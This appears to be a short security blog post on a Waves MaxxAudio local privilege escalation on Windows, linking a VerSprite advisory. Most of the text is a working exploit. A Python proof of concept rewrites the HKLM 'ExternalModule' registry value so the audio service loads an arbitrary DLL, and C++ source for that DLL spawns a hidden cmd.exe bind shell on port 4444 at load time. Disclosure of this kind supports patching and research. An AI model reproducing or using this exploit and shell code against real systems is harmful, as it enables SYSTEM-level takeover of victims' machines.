Write Up: VerSprite | Waves Maxx Audio
Advisories: VerSprite – CVEDETAILS
Comments: This vulnerability exploited can lead to SYSTEM privileged access on the compromised device. I am not sure why “CVEDETAILS” is rating this with a CVSS of only 4.4 when the other LPE to system is a 7.7….
python WavesMaxxAudio-PoC.py
import sys
import winreg
def set_registry(src,value_name,value_data):
registry_key = winreg.OpenKey(winreg.HKEY_LOCAL_MACHINE, src, 0, winreg.KEY_WRITE |
winreg.KEY_WOW64_64KEY)
winreg.SetValueEx(registry_key, value_name, 0, winreg.REG_SZ, value_data)
winreg.CloseKey(registry_key)
return True
def read_registry(src,value_name):
registry_key = winreg.OpenKey(winreg.HKEY_LOCAL_MACHINE, src, 0, winreg.KEY_READ |
winreg.KEY_WOW64_64KEY)
value_data, value_type = winreg.QueryValueEx(registry_key, value_name)
winreg.CloseKey(registry_key)
return value_data
def main():
if(len(sys.argv) < 2):
print("Incorrect usage.\nUsage: WavesMaxxAudio-PoC.py <path_to_malicious_dll>")
sys.exit(0)
user_malicious_dll_path = sys.argv[1]
reg_value_data = user_malicious_dll_path + ";KblCoefsRender51164.dll;MaxxAudio5"
reg_src = r"SOFTWARE\Waves Audio\MaxxAudio\General"
reg_value_name = "ExternalModule"
print("[!] PoC for Waves MaxxAudio LPE")
print("[*] Reading Current registry key value:")
print(read_registry(reg_src,reg_value_name))
print("[*] Writing malicious key value now")
set_registry(reg_src,reg_value_name,reg_value_data)
print("[*] Overwrite Finished:\n[*] Reading new key value data now")
print(read_registry(reg_src,reg_value_name))
if __name__ == '__main__':
try:
main()
except KeyboardInterrupt:
print('Interrupted')
sys.exit(0)
Malicious DLL
#include "stdafx.h"
#include <thread>
#include <shellapi.h>
#include <winsock2.h>
#pragma comment(lib,"ws2_32")
void bind_shell() {
WSADATA wsaData;
SOCKET sock;
struct sockaddr_in sin;
WSAStartup(MAKEWORD(2, 2), &wsaData);
sock = WSASocket(AF_INET, SOCK_STREAM, IPPROTO_TCP, NULL, (unsigned int)NULL, (unsigned int)NULL);
sin.sin_family = AF_INET;
sin.sin_addr.s_addr = htonl(INADDR_ANY);
sin.sin_port = htons((u_short)4444);
bind(sock, (SOCKADDR*)& sin, sizeof(sin));
listen(sock, SOMAXCONN);
SOCKET tmp = accept(sock, 0, 0);
STARTUPINFO si = { 0 };
PROCESS_INFORMATION pi = { 0 };
si.cb = sizeof(si);
si.dwFlags = STARTF_USESTDHANDLES | STARTF_USESHOWWINDOW;
si.wShowWindow = SW_HIDE;
si.hStdOutput = (HANDLE)tmp;
si.hStdError = (HANDLE)tmp;
si.hStdInput = (HANDLE)tmp;
TCHAR commandLine[256] = L"cmd.exe";
CreateProcess(NULL, commandLine, 0, 0, true, CREATE_NEW_CONSOLE, 0, 0, &si, &pi);
CloseHandle(pi.hProcess);
CloseHandle(pi.hThread);
closesocket(tmp);
return;
}
BOOL APIENTRY DllMain(HMODULE hModule,
DWORD ul_reason_for_call,
LPVOID lpReserved
)
{
bind_shell();
return TRUE;
}